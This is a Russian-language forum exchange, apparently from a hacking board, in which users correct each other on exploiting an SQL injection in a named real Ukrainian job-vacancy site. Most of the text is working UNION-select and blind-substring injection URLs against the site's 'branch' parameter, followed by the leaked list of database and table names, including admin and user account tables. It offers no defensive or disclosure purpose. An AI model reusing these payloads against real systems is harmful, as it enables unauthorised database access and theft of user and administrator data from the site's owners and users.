Сообщение от
pinky07
там нет выводимых полей, хотя инфу из бд вполне реально вывести подзапросами, тем более там пятая версия MySQL и там доступно information_schema
Если не уверен, зачем вводить людей в заблуждение?
http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18/*
Сообщение от
pinky07
вот - там пять таблиц с именем %user%
http://trud.dp.ua/vacancyview.php?pagenumber=2&branch=2+and+ascii(su bstring((SELECT+table_name+fr om+information_schema.tables+where+table_name+like +char(37,117,115,101,114,37)+limit+5,1),1,1))=117& area=1
Завязывай писать ахинею.
Если уж используешь подзапросы, то подумай, что ты вывел таким образом.
Таблиц с именем %user% там 15, если уж быть точным
http://trud.dp.ua/vacancyview.php?pagenumber=1&branch=-2+union+select+1,group_concat(concat_ws(0x3a,table _schema,table_name)),3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18+from+information_schema.tables+where+ta ble_name+LIKE+char(37,117,115,101,114,37)/*
information_schema:USER_PRIVILEGES
cacti:user_auth
cacti:user_auth_perms
cacti:user_auth_realm
cacti:user_log,mysql:user
printmedia:adm_users
trainings:adm_users
trainings:cron_user
trn:adm_users
trn:cron_user
truddp:adm_users
work-xeon:admin_user
work-xeon:cron_user
work-xeon:trud_reason_for_blocking_user
work-xeon:trud_user